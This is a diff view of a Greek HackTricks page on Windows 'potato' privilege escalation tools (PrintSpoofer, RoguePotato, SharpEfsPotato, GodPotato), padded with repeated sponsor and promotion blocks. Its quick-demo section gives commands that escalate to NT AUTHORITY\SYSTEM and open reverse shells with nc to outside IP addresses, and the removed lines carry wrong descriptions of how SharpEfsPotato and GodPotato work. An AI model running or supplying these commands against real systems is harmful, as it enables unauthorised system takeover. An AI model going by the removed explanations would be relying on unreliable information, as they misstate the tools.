* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας κινητήρας αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον κινητήρα τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
{% hint style="warning" %}
|
||||
Το **JuicyPotato δεν λειτουργεί** στα Windows Server 2019 και στα Windows 10 build 1809 και μεταγενέστερα. Ωστόσο, τα [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) μπορούν να χρησιμοποιηθούν για να **εκμεταλλευτούν τα ίδια προνόμια και να αποκτήσουν πρόσβαση σε επίπεδο `NT AUTHORITY\SYSTEM`**. Αυτή η [ανάρτηση στο blog](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) παρέχει λεπτομερείς πληροφορίες για το εργαλείο `PrintSpoofer`, το οποίο μπορεί να χρησιμοποιηθεί για την κατάχρηση των προνομίων υποκατάστασης σε υπολογιστές με Windows 10 και Server 2019, όπου το JuicyPotato δεν λειτουργεί πλέον.
|
||||
Το **JuicyPotato δεν λειτουργεί** στα Windows Server 2019 και στα Windows 10 έκδοση 1809 και μετά. Ωστόσο, τα [**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)**,** [**RoguePotato**](https://github.com/antonioCoco/RoguePotato)**,** [**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)**,** [**GodPotato**](https://github.com/BeichenDream/GodPotato) μπορούν να χρησιμοποιηθούν για να **εκμεταλλευτούν τα ίδια προνόμια και να κερδίσουν πρόσβαση σε επίπεδο `NT AUTHORITY\SYSTEM`**. Αυτή η [ανάρτηση στο blog](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/) εξετάζει αναλυτικά το εργαλείο `PrintSpoofer`, το οποίο μπορεί να χρησιμοποιηθεί για την κατάχρηση των προνομίων υποκατάστασης σε υπολογιστές Windows 10 και Server 2019 όπου το JuicyPotato δεν λειτουργεί πλέον.
|
||||
{% endhint %}
|
||||
|
||||
## Γρήγορη επίδειξη
|
||||
## Γρήγορη Επίδειξη
|
||||
|
||||
### PrintSpoofer
|
||||
```bash
|
||||
|
@ -43,22 +57,9 @@ c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l
|
|||
# In some old versions you need to use the "-f" param
|
||||
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999
|
||||
```
|
||||
{% code %}
|
||||
{% endcode %}
|
||||
|
||||
### SharpEfsPotato
|
||||
|
||||
Το SharpEfsPotato είναι ένα εργαλείο που εκμεταλλεύεται τον τρόπο με τον οποίο το Windows επιτρέπει την εκτέλεση κακόβουλου κώδικα με αυξημένα δικαιώματα. Αυτό το εργαλείο χρησιμοποιεί την ευπάθεια του Print Spooler service για να εκτελέσει κώδικα με δικαιώματα συστήματος.
|
||||
|
||||
Για να χρησιμοποιήσετε το SharpEfsPotato, ακολουθήστε τα παρακάτω βήματα:
|
||||
|
||||
1. Κατεβάστε τον κώδικα του SharpEfsPotato από το αποθετήριο του GitHub.
|
||||
2. Ανοίξτε ένα παράθυρο εντολών και μεταβείτε στον φάκελο όπου κατεβάσατε τον κώδικα.
|
||||
3. Εκτελέστε την εντολή `SharpEfsPotato.exe`.
|
||||
4. Αν η εκτέλεση είναι επιτυχής, θα λάβετε ένα κέλυφος με δικαιώματα συστήματος.
|
||||
|
||||
Πρέπει να σημειωθεί ότι το SharpEfsPotato είναι ένα εργαλείο που χρησιμοποιείται για εκπαιδευτικούς και δοκιμαστικούς σκοπούς και δεν πρέπει να χρησιμοποιείται για παράνομες δραστηριότητες.
|
||||
|
||||
{% endcode %}
|
||||
```
|
||||
SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
|
||||
SharpEfsPotato by @bugch3ck
|
||||
|
@ -78,22 +79,6 @@ C:\temp>type C:\temp\w.log
|
|||
nt authority\system
|
||||
```
|
||||
### GodPotato
|
||||
|
||||
The GodPotato technique is a local privilege escalation attack that takes advantage of the Print Spooler service in Windows. It combines the RoguePotato and PrintSpoofer exploits to gain SYSTEM-level privileges on the target system.
|
||||
|
||||
To execute the GodPotato attack, follow these steps:
|
||||
|
||||
1. Download the RoguePotato exploit from the GitHub repository.
|
||||
2. Compile the exploit using Visual Studio or any other C# compiler.
|
||||
3. Run the compiled RoguePotato executable on the target system.
|
||||
4. The RoguePotato exploit will create a malicious RPC endpoint on the target system.
|
||||
5. Download the PrintSpoofer exploit from the GitHub repository.
|
||||
6. Compile the exploit using Visual Studio or any other C++ compiler.
|
||||
7. Run the compiled PrintSpoofer executable on the target system.
|
||||
8. The PrintSpoofer exploit will impersonate the SYSTEM account and connect to the malicious RPC endpoint created by RoguePotato.
|
||||
9. Once connected, the PrintSpoofer exploit will execute arbitrary code with SYSTEM privileges.
|
||||
|
||||
By combining these two exploits, the GodPotato attack allows an attacker to escalate their privileges from a low-privileged user to the highest level of access on the target system. It is important to note that this attack requires local access to the target system and may not work on all Windows versions.
|
||||
```
|
||||
GodPotato -cmd "cmd /c whoami"
|
||||
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
||||
|
@ -105,16 +90,28 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
|
|||
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
|
||||
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα hacking tricks σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
Loading…
Reference in a new issue